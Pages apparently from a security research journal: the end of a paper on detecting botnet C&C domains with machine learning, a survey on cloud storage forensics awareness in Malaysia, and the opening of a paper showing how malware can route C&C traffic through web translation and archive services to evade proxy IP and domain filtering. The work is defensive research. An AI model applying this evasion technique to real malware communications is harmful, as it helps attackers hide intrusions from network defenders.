We construct a training model by using a neural
network with the e-mail addresses and valid terms
from WHOIS, and the numbers of NS records and
MX records from DNS (Figure 8).

Fig. 8 Training model construction phase

The C&C servers can be detected by using this
model implemented in a browser plugin or in the
filter of a proxy server.
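The following sketch shows one way the training-model construction of Figure 8 could be realized with off-the-shelf libraries. It assumes scikit-learn, four numeric features per domain (valid term, a free-mail flag, NS count, MX count), and toy placeholder data; it is not the authors' implementation.

import numpy as np
from sklearn.neural_network import MLPClassifier
from sklearn.svm import SVC
from sklearn.preprocessing import StandardScaler
from sklearn.pipeline import make_pipeline

# Placeholder feature matrix: [valid_term_days, free_mail_flag, ns_count, mx_count].
# Labels: 1 = C&C (malignant) domain, 0 = normal (benign) domain.
X = np.array([[3650, 0, 4, 2], [90, 1, 0, 0], [5475, 0, 2, 1], [30, 1, 1, 0]])
y = np.array([0, 1, 0, 1])

neural_net = make_pipeline(StandardScaler(),
                           MLPClassifier(hidden_layer_sizes=(10,), max_iter=2000, random_state=0))
svm = make_pipeline(StandardScaler(), SVC(kernel="rbf"))

for name, model in (("neural network", neural_net), ("SVM", svm)):
    model.fit(X, y)                              # training-model construction
    print(name, model.predict([[45, 1, 0, 0]]))  # classify an unseen domain

A scaling step is included because the valid term (measured in days) and the record counts have very different ranges, which would otherwise dominate the learning.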

4 Results
For the evaluation, 80 normal and 54 C&C
domains were used.
Because the amount of data is small, the accuracy
can vary greatly depending on how the test data
are chosen; only a small amount of data is
available for the particular domains used in
targeted attacks. Thus, we evaluate the data with
a cross-validation method, because it can reduce
the error margin even when the amount of data
is small.
The cross-validation method divides the original
data into blocks [17]. One of the blocks is used
as the test data, and the others are used as the
learning data for each evaluation.
The evaluation consists of calculating the
average of the per-block evaluation results as the
estimated accuracy (Fig. 9). This evaluation
method can reduce the error margin of the
estimated accuracy even if the amount of data is
small. It can be calculated with the following
equation.
Let N be the number of blocks, T_n be the total
number of test data in the n-th block, C_n be the
number of those data classified accurately, and
a_n = C_n / T_n be the n-th evaluation accuracy.
The estimation accuracy A to be determined is
as follows:

A = (1/N) * Σ_{n=1}^{N} a_n    (1)
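As a sketch of how equation (1) can be evaluated in practice, the code below (assuming scikit-learn and toy placeholder data) splits the data into blocks, uses each block once as the test data, and averages the per-block accuracies a_n = C_n / T_n.

import numpy as np
from sklearn.model_selection import StratifiedKFold
from sklearn.metrics import accuracy_score
from sklearn.svm import SVC

def estimated_accuracy(model, X, y, n_blocks=5):
    accuracies = []
    for train_idx, test_idx in StratifiedKFold(n_splits=n_blocks).split(X, y):
        model.fit(X[train_idx], y[train_idx])
        # a_n = (correctly classified test data) / (total test data) in the n-th block
        accuracies.append(accuracy_score(y[test_idx], model.predict(X[test_idx])))
    return np.mean(accuracies)  # A = (1/N) * sum of a_n

# Toy placeholder data standing in for the 80 normal and 54 C&C domains.
rng = np.random.default_rng(0)
X = rng.normal(size=(60, 4))
y = (X[:, 0] > 0).astype(int)
print(estimated_accuracy(SVC(), X, y))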



Fig. 9 Cross-validation method


We evaluate the training models by the
cross-validation method (Table 3).
Table 3 Detection rates

                 Neural network   SVM
Detection rate   98.5%            97.8%


As a result, the neural network achieved a
superior detection rate of 98.5%, compared to
97.8% for the SVM.
5 Conclusion


In this paper, we collected the feature points of
the e-mail addresses used for C&C domains and
proposed a method to determine C&C servers by
using machine learning with WHOIS and DNS
information. Moreover, we clarified the features
of the WHOIS registration agency services used
for the C&C domains by illustrating the relations
of the words of the extracted e-mail addresses in
the co-occurrence networks.
Finally, we evaluated the e-mail addresses and
the valid terms from WHOIS, together with the
numbers of NS records and MX records from the
DNS, as input values for machine learning. In
future work, we will aim to improve the accuracy
by revising the machine learning algorithms, the
input values, and the preprocessing.

REFERENCES

[1] Cyber GRID View vol.1 English Edition, http://www.lac.co.jp/security/report/pdf/apt_report_vol1_en.pdf
[2] H. Mihara and R. Sasaki, "Proposal and Evaluation of Technique to Detect C&C Server on Botnet Using Attack Data (CCCDATAset 2009) and Quantification Methods Type II", Journal of Information Processing Society of Japan, Vol. 51, No. 9, pp. 1579-1590 (2010).
[3] D. I. Jang, M. Kim, H. C. Jung, and B. N. Noh, "Analysis of HTTP2P Botnet: Case Study Waledac", 2009 IEEE 9th Malaysia International Conference on Communications (MICC), pp. 409-412 (2009).
[4] W. Lu, M. Tavallaee, and A. A. Ghorbani, "Automatic Discovery of Botnet Communities on Large-Scale Communication Networks", ASIACCS '09: Proceedings of the 4th International Symposium on Information, Computer, and Communications Security (2009).
[5] M. H. Tsai, K. C. Chang, C. C. Lin, C. H. Mao, and H. M. Lee, "C&C Tracer: Botnet Command and Control Behavior Tracing", IEEE International Conference on Systems, Man and Cybernetics (SMC), Anchorage, AK, pp. 1859-1864 (2011).
[6] Alexa Top 500 Global Sites, http://www.alexa.com/topsites
[7] Targeted Attack Trends 2014 Annual Report, https://www.trendmicro.com/cloudcontent/us/pdfs/security-intelligence/reports/rpttargeted-attack-trends-annual-2014-report.pdf
[8] Trend Micro Press, http://www.trendmicro.co.jp/jp/about-us/pressreleases/articles/20150409062703.html
[9] VirusTotal, https://www.virustotal.com/
[10] LastLine, https://www.lastline.com/
[11] M. Felegyhazi, C. Kreibich, and V. Paxson, "On the Potential of Proactive Domain Blacklisting", USENIX Conference on Large-scale Exploits and Emergent Threats, p. 6 (2010).
[12] J. Ma, L. K. Saul, S. Savage, and G. M. Voelker, "Beyond Blacklists: Learning to Detect Malicious Web Sites from Suspicious URLs", ACM SIGKDD International Conference on Knowledge Discovery and Data Mining, pp. 1245-1254 (2009).
[13] L. Invernizzi, S. Benvenuti, P. M. Comparetti, M. Cova, C. Kruegel, and G. Vigna, "EvilSeed: A Guided Approach to Finding Malicious Web Pages", IEEE Symposium on Security and Privacy, pp. 428-442 (2012).
[14] User Local, http://textmining.userlocal.jp/
[15] Multilayer Perceptron, http://deeplearning.net/tutorial/mlp.html
[16] J. Platt, "A Fast Algorithm for Training Support Vector Machines", Technical Report MSR-TR-98-14, pp. 1-21 (1998).
[17] R. Kohavi, "A Study of Cross-Validation and Bootstrap for Accuracy Estimation and Model Selection", Proceedings of the Fourteenth International Joint Conference on Artificial Intelligence, Vol. 2, pp. 1137-1143 (1995).


Awareness of Cloud Storage Forensics among the Users in Malaysia: A Survey


Yee Say Keat1, Babak Bashari Rad2, Mohammad Ahmadi3
School of Computing and Technology
Asia Pacific University of Technology & Innovation (APU)
Technology Park Malaysia (TPM)
Bukit Jalil, Kuala Lumpur 57000 Malaysia
1 [email protected], 2 [email protected], 3 [email protected]

ABSTRACT
Cloud storage services are gaining wide
acceptance and popularity; they are used mostly
by companies and by students in Malaysian
higher learning institutions. Although cloud
storage services have become popular within the
last two years, most people are still adapting to
this new technology, and some still do not fully
understand what cloud storage services are. In
this paper, the authors present the results and an
analysis of a survey conducted on the awareness
and concerns of Malaysians about cloud storage
services and their forensics and security issues.
Questionnaires were administered to two hundred
fifty users of cloud storage in Malaysia and to
fifty members of the public, especially students,
to collect their responses concerning cloud
storage services. The responses from the
participants revealed valuable information about
public awareness and knowledge of cloud
services. Relevant areas that require improvement
are also investigated and discussed in this paper.
KEYWORDS
Cloud Computing, Cloud Storage, Cloud
Forensics, Cloud Security, Cloud Forensics
Awareness
1 INTRODUCTION
Cloud storage services are increasingly used by
various types of ordinary consumers and
professional businesses, as well as by government
departments and organizations that store large
amounts of data, such as educational institutions
[1]. The new trend in storing data is to use cloud
storage, due to its convenience and accessibility
anytime and anywhere [2]. However, there are
still many problems and concerns with cloud
storage [3]. For example, if the security of a
cloud storage system has been compromised, can
cloud storage administrators or investigation
officers view users' confidential data, and what
would be the best way to prevent such exposure?
A survey was conducted among users of cloud
storage services and white-collar users from the
Information Technology and business industries
to explore these concerns. The study involved
data collection among students in several
universities in Malaysia using questionnaires.
The authors believe this research will help
investigators, examiners, developers, and forensic
investigation companies who are interested in
developing forensic tools, countermeasures, and
techniques to develop their knowledge and
investigation skills based on the public
consciousness of cloud storage in Malaysia.
2 LITERATURE REVIEW
Cloud storage forensic research is considered a
new research area and a hot topic in information
technology [4] [5]. As people try to adapt to this
new technology and service, most of them are
also trying to gain more information and
knowledge about what it can offer [6].
Furthermore, as more people use cloud storage
services, the more dangerous the issues and
challenges they present for security and forensic
investigators [7]. This is because cloud storage
services are open to anyone who has access to
the Internet. Users such as hackers are also free
to use the services to conduct criminal activities
[8] [9]. Groups of hackers will find vulnerabilities
in the systems and carry out hacking activities.
For example, in the 2014 incident involving
Apple, private photos of around 26 celebrities
were stolen by a group of hackers [10].
Furthermore, cloud computing is computing
based on the Internet. For the last 10-20 years,
people would run applications or programs from
software downloaded onto a physical computer,
or place servers inside their organizations.
Nowadays, however, cloud computing technology
allows users to access the same kinds of
programs and platforms through the Internet [11].
2.1 Introduction to Cloud Computing
Cloud computing is transforming the way
information technology is managed and
consumed, promising improvements in cost
efficiency, accelerated technology and innovation,
and the ability to scale applications on demand
[12]. Cloud computing is a model for on-demand
network access to a shared pool of configurable
computing resources, such as servers, networks,
storage, services, and applications, which can be
conveniently and rapidly provisioned, and it can
minimize management effort and service provider
interaction [13]. In a very simple definition, cloud
computing is a combination of technologies that
presents a platform for providing hosting and
storage services through the Internet [14].
Furthermore, cloud computing represents the
high end of information technology for society,
so its main objective is to produce and offer a
standard service with a low-cost, on-demand
computing infrastructure that provides satisfactory
resources, quality, and stability of service levels [15].


2.2 Cloud Computing Security and Issues


Security and privacy issues will always be a
topic of concern. In the 21st century, we all live
in increasingly interconnected environments,
from social networks to personal banking and
government infrastructure, and protecting these
networks is no longer optional [16]. There are
multiple security issues for cloud computing, as
it involves many technologies, including
operating systems, virtualization, databases,
transaction management, and, most importantly
at the moment, the network [17]. Hence, cloud
computing inherits the security issues of most of
these underlying technologies and systems [18].
For example, the network that interconnects the
systems in the cloud must be sufficiently secured
to avoid security and privacy issues in those
systems, and the mapping of physical machines
to virtual machines has to be carried out
securely [19].
3 AIM OF THE RESEARCH
The main aim of this research is to analyze and
identify the level of awareness of cloud storage
services among ordinary users, as well as users
from white-collar organizations in Malaysia. The
goal is to show how aware Malaysians are of
cloud storage services, highlight the need for
further understanding of the security issues
surrounding cloud storage, and suggest
improvements for people who use these services.
To achieve this aim, the information was gathered
using a set of questionnaires given directly to
the respondents, with the purpose of each
question clearly stated.
4 DATA COLLECTION
Data were collected for this research using a
questionnaire sent directly to respondents to get
the most relevant and helpful information. A
questionnaire also brings many benefits, such as
gathering public views, comments, thoughts, and
opinions in a very efficient way. In this study,
the questionnaire was produced using Google
Forms, as the researchers found that most people
prefer this format for replying to a survey
because it is very easy to complete. Ten questions
were developed by the researchers and divided
into three segments: cloud computing, cloud
forensics and cloud storage security, and future
expectations of cloud storage. The questions were
designed to obtain the information needed to
achieve the aim of this paper.
5 SAMPLING METHODS
Stratified sampling was employed to target
populations in Malaysia. This method enables
the division of the targeted population into
distinct categories. This research mainly focused
on users concerned with cloud storage forensics
and security. The researchers worked out the
proportions needed for the sample to be
representative of this study and identified the
different types of users as the target population.
The researchers therefore divided the survey
respondents into the relative percentages of each
group to make the results more accurate, since
users with different educational backgrounds will
have different points of view on cloud storage
forensic and security issues. The target population
of two hundred fifty cloud storage users in this
study comprised: Information Technology: 55
students, Forensic and Security Computing: 75
students, Software Engineering: 40 students,
Business Administration: 40 students, Mobile
Technology: 20 students, and others: 20 students.
In addition, fifty white-collar respondents from
industry also participated in this research, so a
total of three hundred cloud storage services
users took part.


6 FINDINGS AND ANALYSIS
This section focuses on the findings and analysis
of the data collected by the authors via the
questionnaire. The data are presented and
analyzed using diagrams and figures.
6.1 Demographic Distribution of Respondents
The distribution of respondents in the study is
shown in Figure 1. It shows the education
background of the respondents as follows:
Information Technology students: 18%, Forensic
and Security Computing students: 25%, Software
Engineering students: 13%, Business
Administration students: 13%, Mobile Technology
students: 7%, and others: 7%. In addition, 17%
of the respondents are white-collar workers from
the Information Technology, security, and
business industries.
[Pie chart of respondents' education backgrounds: Information Technology 18%, Forensic and Security Computing 25%, Software Engineering 13%, Business Administration 13%, Mobile Technology 7%, Others 7%, white-collar workers 17%]
Figure 1: Education Background


6.2 Respondents' Perception of Cloud Computing in Malaysia
In this question, the researchers surveyed
respondents on their perception and understanding
of cloud computing as a trend in Malaysia. The
questions were designed using a five-point Likert
scale: strongly agree, agree, neutral, disagree, and
strongly disagree.
6.2.1 Cloud Computing as a Trend

The purpose of this question is to analyze what
respondents think of cloud computing at the
moment, as the technology is growing fast.
Figure 2 shows the responses on cloud computing
as a current trend in Malaysia. Of the 300
respondents who answered the question, the
majority (75%) strongly agreed or agreed that
cloud computing in Malaysia today is part of the
evolving and growing process of computing since
its early years. 20% of respondents strongly
agreed or agreed that cloud computing is a trend
of compromising security to reduce cost. Only
5% of participants strongly agreed or agreed that
cloud computing is just a result of the recession,
adopted to reduce information technology costs.
According to these results, the researchers
conclude that cost reduction is not the main
driver of cloud adoption: 75% of respondents
believe that cloud computing is an evolution of
computing. IT grows and changes quickly
because the environment has changed [20]. For
example, twenty years ago a salesperson had to
carry as many documents as possible to meet
customers; today, a tablet or smartphone is
enough to go through all the necessary documents,
which are stored in cloud storage. IT has become
a priority for everyone and is also changing
people's lifestyles [21]. This is what the 75% of
participants think of cloud computing: it may
change the way people store data.
[Pie chart: 75% evolving and growing process of computing, 20% compromising security and reducing cost, 5% result of the recession for reducing information technology cost]
Figure 2: Cloud Computing as a Trend

6.3 Cloud Storage Services Security

At the moment, most information technology
users are not concerned about a new technology
being introduced to the market so much as about
its security [22]. According to Figure 3, 77% of
the respondents are not interested in keeping
their confidential data and private information in
cloud storage services, because they are not
confident that any action can be taken by the
security authorities after an incident. The majority
of respondents therefore believe that cloud
storage is not safe enough for storing their
personal information. Only 23% of respondents
are not afraid to place personal belongings such
as photos and videos in cloud storage, and agree
that cloud storage services are secure places to
preserve their private data. Even though Malaysia
has had no serious security breach, such as a
data or photo breach from cloud storage services
[23], the majority of cloud storage users do not
trust cloud storage and do not keep their personal
information and documents there; instead, they
store their significant data on personal hard disks
or pen drives and keep them with them at all
times.


[Pie chart: 77% "No, it is not secure"; 23% "Yes, it is safe and secure"]
Figure 3: Cloud Storage Services Security

Furthermore, the minority of 23% of participants
believe that cloud storage service providers are
able to provide a secure place for users to store
their personal documents and have a secure
backup plan if a data breach occurs. This may
be due to the fact that they believe providers
who offer the service and operate in the market
must be sufficiently secure, since offering an
insecure service could lead to lawsuits from
users if a security breach happens, or at least to
the easy loss of customers.

6.4 Cloud Forensics Challenges

Participants responded on the challenges for
cloud storage forensics in Malaysia, and the
results are shown in Figure 4. As shown in the
figure, more than one answer was acceptable for
this question and the values are in percentages.
The results show that the respondents take this
very seriously, as Malaysia is not a developed
country such as Singapore [24]. To become a
developed country, Malaysia needs to focus not
only on industrialization; the country also needs
more effort in the information technology
industry, as it is a part of development as well
[25].

[Bar chart: respondents' ratings (Neutral / Significant / Very Significant) of cloud forensics challenges, including limited investigator skill set or limited authorization power, lack of jurisdiction for cloud storage forensics, lack of international collaboration for exchange and data access authorization, dependency on the cloud storage provider in the investigation chain, lack of law/regulation and legal advisory, lack of experience, and lack of forensic expertise]
Figure 4: Cloud Forensics Challenges


Furthermore, the analysis of the results clearly
shows that 95% of respondents consider it a very
significant challenge that regulations limit the
power of the related departments in Malaysia,
which is coupled with a limited skill set and
limited authorization power for investigators. In
addition, 78% of cloud storage users agree that
it is very significant that investigators lack
jurisdiction when a crime incident happens.
Besides that, 86% of participants agree that the
lack of forensic experts in Malaysia is very
significant, and 75% believe the lack of
experience is a very significant issue. This means
that if any crime related to cloud storage happens
in Malaysia, forensic experts may not be able to
investigate it.
The results show that the respondents are not
sufficiently confident that forensic experts in
Malaysia can investigate and overcome an
incident if one occurs. A majority of 80% feel
there is a lack of laws and regulations when
legal advice is needed. It is not a healthy
situation when Malaysians believe that the
enforcement agencies will not be able to take
any action against such crime. Besides that, some
of the respondents believe that recent cases in
Malaysia are the reason society does not feel
confident about such investigations.
7 CLOUD STORAGE SERVICES
DEVELOPMENT IN MALAYSIA IN THE NEXT 10
YEARS
As shown in Figure 5, 76% of the participants
agree that cloud storage services will become
more efficient and will be used by most of the
population in Malaysia. This is because the world
is improving, information technology in particular
is growing quickly, and Malaysia will have no
choice but to follow the world's footsteps.
However, 24% of the participants disagree and
believe that cloud storage services in Malaysia
will not be efficient in the next 10 years, as
Malaysia is


facing obstructions in many respects [26].
Furthermore, the authors received some thoughts
and comments from the 76% of respondents.
They believe that Information Technology will
change Malaysians' lifestyle and culture in using
technology products in the future. For example,
people nowadays are able to sign documents
using an electronic signature rather than a
physical signature, unlike 20 years ago. On the
other hand, the group of 24% of respondents
believe that the government's policies may slow
down this growth or be an obstruction to
Malaysia achieving Vision 2020, which was
introduced by the fourth prime minister of
Malaysia, Tun Dr. Mahathir Mohamad. In
addition, according to H. S. Borji [25], Malaysia
is not considered a developed country, because
its level of industrialization and overall standard
of living are not on par with the most well-known
developed countries in the world, such as the
United States of America, the United Kingdom,
Singapore, Australia, and Russia. Therefore,
Malaysia still has more to do for the country's
development, and one priority can certainly be
Information Technology development.
[Pie chart: 76% "Yes, it will be used by most of the people shortly"; 24% "No, it will not be famous as it is"]
Figure 5: Cloud Storage in Malaysia next 10 years


8 CONCLUSION
The analysis of the results in this study has
shown a very low level of awareness of cloud
storage services among Malaysians at the
moment. This may stem from many factors, such
as Malaysian culture or government policies.
Furthermore, cloud forensics raises significant
challenges for cloud storage forensics, and those
challenges cannot be ignored by the related
departments, such as the police, forensic
investigation departments, and cloud computing
experts. Hence, there is an urgent need to
establish cloud storage forensics capabilities,
including a set of procedures for conducting an
investigation. At the same time, cloud storage
services bring new opportunities to society, as
people will change the way they live and get
things done more efficiently and faster. Lastly,
preparation for Malaysia to control and supervise
the Internet must be considered; so far, no
serious cloud storage crime has happened or
been reported in Malaysia, which may be the
reason for the lack of experienced investigators,
and society and the related departments may
panic if such a crime happens. Furthermore, to
become a developed country, improving and
expanding Information Technology is one of the
main concerns, because IT can improve different
aspects of a country's development. For example,
the demand for IT is growing wide and huge as
the market is shaped by modern technologies,
and consumers tend to search for information
about products through IT platforms such as
Alibaba and other online shopping websites.
9 FUTURE RECOMMENDATIONS
This study obtained a high response rate and
satisfactory answers for most of the items in the
questionnaires. Through this research, the authors
have been able to determine the level of
awareness among Malaysians about cloud storage
services in this country. Although the level of
awareness is very low, it should be a wake-up
call for Malaysians that this is not just an
Information Technology trend, but also a service
whose hidden security issues users should know
and be aware of. This study successfully tested
and measured the awareness of cloud storage
service users. The authors believe that this
research will help the relevant organizations and
government departments to spread awareness
through information sharing on cloud storage, so
that users can be prudent about what data they
should and should not upload to cloud storage.
Besides that, system developers are encouraged
to develop more forensics and security tools for
investigators for when they are really needed for
investigation purposes.
REFERENCES
[1] C. Chu, Y. Ouyang and C. Jang, "Secure
data transmission with cloud computing in
heterogeneous wireless networks", Security and
Communication Networks, vol. 5, no. 12, pp.
1325-1336, 2012.
[2] S. Kamara, "Encrypted Search", XRDS:
Crossroads, The ACM Magazine for Students,
vol. 21, no. 3, pp. 30-34, 2015.
[3] M. Jouini and L. Rabai, "A Security
Framework for Secure Cloud Computing
Environments",International Journal of Cloud
Applications and Computing, vol. 6, no. 3, pp.
32-44, 2016.
[4] J. Hurwitz, M. Kaufman, F. Halper and D.
Kirsch, Hybrid Cloud For Dummies. Hoboken:
John Wiley & Sons, 2012.
[5] R. Megiba Jasmine and G. Nishibha,
"Public Cloud Secure Group Sharing and
Accessing in Cloud Computing", Indian
Journal of Science and Technology, vol. 8, no.
15, 2015.
[6] A. Pichan, M. Lazarescu and S. Soh, "Cloud
forensics: Technical challenges, solutions and
comparative analysis", Digital Investigation,
vol. 13, pp. 38-57, 2015.
[7] D. Quick and K. Choo, "Google Drive:
Forensic analysis of data remnants", Journal of


Network and Computer Applications, vol. 40,


pp. 179-193, 2014.
[8] M. Taylor, J. Haggerty, D. Gresty and D.
Lamb, "Forensic investigation of cloud
computing systems", Network Security, vol.
2011, no. 3, pp. 4-10, 2011.
[9] M. Gaikwad, "A Review On Security Issues
In Cloud Computing", International Journal Of
Engineering And Computer Science, 2016.
[10] L. Dave, "Forbes Welcome", Forbes.com,
2016.
[Online].
Available:
http://www.forbes.com/sites/davelewis/2014/09
/02/icloud-data-breach-hacking-and-nudecelebrity-photos/#135f56693f69.
[Accessed:
20- May- 2016].
[11] H. Srivastava and S. Kumar, "Control
Framework
for
Secure
Cloud
Computing", Journal of Information Security,
vol. 06, no. 01, pp. 12-23, 2015.
[12] R. Megiba Jasmine and G. Nishibha,
"Public Cloud Secure Group Sharing and
Accessing in Cloud Computing", Indian
Journal of Science and Technology, vol. 8, no.
15, 2015.
[13] K. Muhammad and M. Khan,
"Augmenting Mobile Cloud Computing
through Enterprise Architecture: A Survey
Paper", International Journal of Grid and
Distributed Computing, vol. 8, no. 3, pp. 323-336, 2015.
[14] U. Ismail, S. Islam, M. Ouedraogo and E.
Weippl, "A Framework for Security
Transparency in Cloud Computing", Future
Internet, vol. 8, no. 1, p. 5, 2016.
[15] C. Millard, "Forced Localization of Cloud
Services: Is Privacy the Real Driver?", IEEE
Cloud Comput., vol. 2, no. 2, pp. 10-14, 2015.
[16] P. Boshe, "Data privacy law: an
international
perspective", Information
&
Communications Technology Law, vol. 24, no.
1, pp. 118-120, 2015.
[17] K. Michael, "Securing the Cloud: Cloud
Computer
Security
Techniques
and


Tactics", Computers & Security, vol. 31, no. 4,


p. 633, 2012.
[18] G. E., "What Is Cloud Computing?", PCMag Asia, 2015. [Online]. Available: http://sea.pcmag.com/networkingcommunications-softwareproducts/2919/feature/what-is-cloudcomputing. [Accessed: 24-May-2016].
[19] "The Impact of Cloud Computing on the Protection of Personal Data in Malaysia", IPCSIT, vol. 45, 2013.
[20] M. Ahmed and M. Ashraf Hossain,
"Cloud Computing and Security Issues in the
Cloud",International Journal of Network
Security & Its Applications, vol. 6, no. 1, pp.
25-36, 2014.
[21] M. Workman, "New media and the
changing face of information technology use:
The importance of task pursuit, social
influence, and experience", Computers in
Human Behavior, vol. 31, pp. 111-117, 2014.
[22] B. , "PROVIDE SECURITY ABOUT
RISK
SCORE
IN
MOBILE
APPLICATIONS",International Journal of
Research in Engineering and Technology, vol.
04, no. 09, pp. 318-320, 2015.
[23] A. Moran and J. Narula, "Scorecard for
NCDs", Global Heart, vol. 8, no. 2, p. 181,
2013.
[24] J. Wonglimpiyarat, "Innovation financing
policies for entrepreneurial development
Cases of Singapore and Taiwan as newly
industrializing economies in Asia", The Journal
of High Technology Management Research,
vol. 24, no. 2, pp. 109-117, 2013.
[25] H. Borji, "Is Malaysia a developed
country? | Investopedia", Investopedia, 2015.
[Online].
Available:
http://www.investopedia.com/ask/answers/1126
15/malaysia-developed-country.asp. [Accessed:
03- Jul- 2016].
[26] "e-Security: The First Line of Digital
Defence Begins with Knowledge", MOSTI, vol.
39, 2015.


Filtering Avoidance Using Web Translation Service and its Countermeasures


Ryota Suzuki, Atsuo Inomata, and Ryoichi Sasaki
Tokyo Denki University
5 Senjuasahicho, Adachi-ku, Tokyo-to 120-8551, JAPAN
[email protected]

Abstract
Recently, damage by targeted attacks has been
increasing and has also become diversified. A
targeted attack is any malicious attack targeted
toward a specific individual or organization. It has
the characteristic that damage is likely to expand
because it is hardly noticeable. Therefore, the
assumed countermeasures, such as early detection and
damage reduction, are important factors for the
prevention of targeted attacks. In this paper, we
propose attack methods that are able to avoid
filtering by using web translation services, and then
we propose countermeasure methods. Also, to
evaluate our proposals, we surveyed other attack
methods, including those used in combination, such
as shortened URL services and web archive services.

Figure 1 shows a targeted attack. An attacker
sends malware to the target (1). The malware
infects the victim's computer, and the malware
on the victim PC then communicates with the
command and control (C&C) server (2). Software
is downloaded to expand the functions of the
malware (3). The expanded malware spreads to
other PCs or servers (4). The malware then
usually sends internal information to the C&C
server using the HTTP protocol (5).

Keywords
Targeted attack, Malware, C&C communications,
Web translation service, URL shortener
Figure 1. Targeted attack

1 Introduction

Recently, damage by targeted attacks has been
increasing and has also become diversified. A
targeted attack is any malicious attack that is
targeted toward a specific individual or
organization. Therefore, the assumed
countermeasures, such as early detection and
damage reduction, are important factors for the
prevention of targeted attacks. The larger the
scale of an organization, the more difficult the
prevention of infection becomes; that is, it
becomes more difficult for the countermeasures
in a large organization to prevent a targeted
attack [1].


Accordingly, countermeasures such as early
detection and damage reduction are important for
the prevention of targeted attacks [2]. In the
present study, we propose attack methods that
succeed because they avoid filtering by using
web translation services, and we assume an
infection in order to consider the countermeasures.
In this paper, we first present attack methods
that are able to avoid filtering by utilizing web
translation services. Next, we show related work
and our investigation of translation services.


Then, by conducting experiments, we show that
it is possible to carry out the attack through
various translation services. We also evaluate the
attack methods. Finally, we conclude the paper.
In some web translation services, such as
Google Translate and Excite Translator, anybody
can easily translate the contents of an input web
page into another language by entering the URL
of the web page. Many web translation services
provide a translation function for a target web
page. By using such a translation function, it is
also possible for anybody to retrieve the contents
of a target web page through the web translation
service without the client establishing direct
communication with the target web page. Figure
2 shows the filtering avoidance method, in which
the malware disguises the destination of its
communication with the C&C server by going
through the web translation service. As a result,
even under filtering by the organization's proxy
servers, communication with prohibited C&C
servers becomes possible, which complicates the
discovery of suspicious communications.

Consequently, we discuss the techniques related
to the attack methods. By understanding the
techniques behind the attack methods, we can
consider countermeasures to prevent the attacks.
2 Related Work

One method of using web translation services
for an attack is Jikto [3]. Jikto uses Google
Translate for port scanning in JavaScript.
BarracudaLab [4] reported a method in which
the sender of spam e-mail counters spam filtering
by combining Google Translate and a URL
shortening service. This approach exploits the
fact that URL filtering in e-mail is verified by
evaluating the linked domains. First, the URL of
the page that redirects to the spam is shortened
by a URL shortener. The shortened URL is then
wrapped in the web page translation function of
Google Translate, and the URL of the generated
page is sent by e-mail. Thus, the recipient sees
only a link on the Google domain, and filtering
becomes difficult. These works also relate to
attacks using Google Translate, but they do not
deal with the avoidance of filtering of C&C
communications.
3 Aims of this paper

We investigate the translation services that
translate a web page and display external web
pages, which would be available for a filtering
avoidance attack. Table 1 shows the services that
can display external web pages.
Figure 2. Filtering avoidance method

Some researchers have known about this
possibility of filtering avoidance, but it had not
been verified whether it is actually feasible. In
order to evaluate the possibility, we designed an
experimental scenario that shows that filtering
avoidance is indeed possible. In addition, we
conducted experiments combining shortened URL
services and other services, such as web archive
services, with the attack method, and again
verified the possibility of a successful attack.


Table 1. Viewable web translation services


Service
Google Translate [5]
Bing Translator [6]
Excite Translator [7]
Yahoo! translation [8]
Infoseek translation [9]
So-net translation [10]
WorldLingo [11]
SDL (freetranslation.com) [12]


From the results of the investigation, we found
that most of these web services can translate and
display an external web page with their own
translation function. Furthermore, in addition to
the web translation services in Table 1, we found
that some web services, such as the Internet
Archive Wayback Machine [13] and Web Fish
Print [14], can save and display a web page from
an arbitrary point in time, so we think that these
services should also be considered available to
an attacker.
4 Experiments

In this paper, we define the functions needed to
determine whether the proposed filtering
avoidance method is applicable to targeted
attacks. Specifically, in a state where
communication to the target server is prohibited
by filtering, we confirm that the attack method
is feasible through the following functions, which
we examine in Sections 4.1, 4.2, and 4.3:
(1) Command reception method
(from the C&C server to the malware)
(2) File reception method
(from the C&C server to the malware)
(3) Response transmission method
(from the malware to the C&C server)
Our experimental environment is as follows:
OS: Windows 10 Education
Proxy server: Squid 3.5
Web browser: Mozilla Firefox
Experimental program: Java
To prevent a page from being displayed from the
cache, we conducted the experiments with
no-cache set on the proxy server and the web
browser. Table 2 shows the filtering types used
in the experiments.
Table 2. Filtering types

IP address filtering: Block a communication to a host of a specific IP address.
Domain filtering: Block a communication to a host for a particular domain name.
URL filtering: Block a communication when a detected target string is in the URL. (The string of the detected target specifies the IP address and the domain name of the target host.)
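To make the three filtering types concrete, the following Python sketch expresses them as a single proxy-side decision over a requested URL and the IP address it resolves to; the blacklist values and function names are illustrative assumptions, not the Squid configuration used in the experiments.

from urllib.parse import urlparse

BLOCKED_IPS = {"203.0.113.10"}            # placeholder C&C server address
BLOCKED_DOMAINS = {"cc-example.test"}     # placeholder C&C domain
BLOCKED_URL_STRINGS = {"203.0.113.10", "cc-example.test"}

def is_blocked(url, resolved_ip):
    host = urlparse(url).hostname or ""
    if resolved_ip in BLOCKED_IPS:                                          # IP address filtering
        return True
    if any(host == d or host.endswith("." + d) for d in BLOCKED_DOMAINS):   # domain filtering
        return True
    if any(s in url for s in BLOCKED_URL_STRINGS):                          # URL filtering
        return True
    return False

# A request routed through a translation service still carries the C&C domain inside its URL,
# so URL filtering can catch it even though the host actually contacted is the translation service.
print(is_blocked("https://translate.example/translate?u=http%3A%2F%2Fcc-example.test%2F",
                 "198.51.100.7"))  # True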

4.1 Command reception method


We investigated whether the transmission of
commands from the C&C server to the malware
is possible in the filtering environment. As the
transmission method for commands, the attacker
writes the command to a page on the web server,
and the malware then receives it by connecting
via the translation service. In this experiment, we
compared a normal connection with a connection
via the translation service, and we confirmed that
the malware can retrieve information from the
server by avoiding the filtering via the translation
service.
Table 3. Filtering avoidance results by service for the command reception
(cells indicate whether acquisition was successful or blocked)

Communication method   IP address   Domain   URL
Normal
Google Translate
Excite Translator
Yahoo! translation
Infoseek translation
So-net translation
WorldLingo
SDL
Internet Archive
Web Fish Print

The results of the experiment (Table 3) show
that, for the normal connection, the
communication was blocked by all filtering
formats; thus, the filtering itself functions
properly. In contrast, with every web translation
service, information could be transmitted
successfully from the C&C server by avoiding
IP address filtering and domain filtering.
However, for many web translation services,
when URL filtering was performed, the filtering
function of the proxy server prevented the
transmission of information from the C&C
server. Because these services store the URL
of the web page to be translated in the GET


parameter, the URL sent to the web translation
service contained the C&C server's domain name.
The C&C domain name is underlined in Table 4.
The other translation services also send the URLs
of the web pages to be translated by the GET
method, so we consider URL filtering of the GET
parameter to be an effective countermeasure
against the filtering avoidance method using
translation services.
